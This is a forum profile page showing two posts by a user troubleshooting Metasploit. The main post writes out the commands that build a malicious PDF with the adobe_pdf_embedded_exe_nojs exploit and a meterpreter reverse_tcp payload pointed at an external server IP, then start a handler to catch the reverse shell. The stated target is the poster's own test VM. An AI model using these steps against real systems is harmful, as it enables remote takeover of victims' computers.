Jump to content

dns_master

Members
  • Posts

    2
  • Joined

  • Last visited

Recent Profile Visitors

226 profile views

dns_master's Achievements

Newbie

Newbie (1/14)

  1. Thank you for your replay. Ok, i try with internal IP. But is there no way to use the external IP for reverse connection ? Greetings.
  2. Hello guys, i wanted to use the Adobe PDF Embedded Exe NOJS Exploit (use exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs) on my Ubuntu Server where i installed Metasploit. After setting up the exploit: Msf exploit (adobe_pdf_embedded_exe_nojs)>set payload windows/meterpreter/reverse_tcp Msf exploit (adobe_pdf_embedded_exe_nojs)>set lhost 85.214.XX.XX Msf exploit (adobe_pdf_embedded_exe_nojs)>set filename file.pdf Msf exploit (adobe_pdf_embedded_exe_nojs)>exploit I used for localhost my Server IP Adress, in case to make a real-world pentesting. After that, setting up the multi handler to get the reverse connection: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 85.214.XX.XX exploit I sent the PDF file to my virtual machine, Windows 7. I run the PDF file, but i didn't get the reverse connection - i didnt received a connection on metasploit. What am I doing wrong ? A log of my server: Linux 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Thank you guys.
×
×
  • Create New...